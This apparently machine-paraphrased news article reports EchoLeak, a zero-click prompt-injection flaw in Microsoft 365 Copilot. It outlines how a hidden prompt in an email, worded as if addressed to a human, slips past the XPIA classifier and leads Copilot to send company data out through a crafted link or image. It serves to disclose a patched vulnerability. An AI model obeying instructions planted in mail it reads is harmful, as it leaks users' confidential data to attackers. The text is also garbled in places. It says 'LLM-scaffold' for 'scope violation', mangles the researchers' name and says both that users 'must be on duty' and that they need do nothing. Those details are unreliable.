- Security researchers AIM labs discovered an LLM -scaffold violation error in Microsoft 365 Copilot
- The critical difficulty error allows threat actors to exfilter sensitive company data by sending an e-mail
- Microsoft says it has solved the problem on the server side but users must be on duty
Microsoft has corrected a dangerous zero-click attack in its generative Artificial Intelligence (Genai) model, which could have enabled threat players to silently exfilter sensitive company data without (almost) any user interaction.
CyberSecurity scientists are aiming for laboratories that found the error known as an “llm -scope violation”, and called it Echoleak.
Here’s how it works: A threat actor sends a seemingly harmless email message to the target containing a hidden prompt that directs copilot to exfilter sensitive data to an attacking-controlled server. Since Copilot is integrated into Microsoft 365, this data may include everything from intellectual property files, to business contracts and legal documents or from internal communication to financial data.
Critical vulnerability
The researchers note that the prompt must be formulated as talking to a human being so that it bypasses Microsoft’s XPIa (cross-prompt injection attack) defense.
Later, when the victim interacts with copilot and asks a business-related question, LLM will draw all the relevant data (including the strikers’ email message) and end up performing them. The files are stored in a designed link or image.
The error was awarded the CVE-2025-32711 identifier and received a severity of 9.3/10 (critical). It was a regular server site in May, which means users don’t have to do anything. Microsoft also said there is no evidence that the error had been exploited in the past and that none of its customers were affected.
Microsoft 365 is one of the most popular cloud-based communications and online collaboration tools that combine Office apps (Word, Excel and others), Cloud Storage (OneDrive and SharePoint), e-mail and calendar (Outlook, Exchange) and communication tools (Teams).
Recently, Microsoft integrated its generative AI model, Copilot, in Microsoft 365 so that users can prepare and summarize E emails, generate and edit documents, create data visualizations and analyze trends and more.
Via Bleeping computer
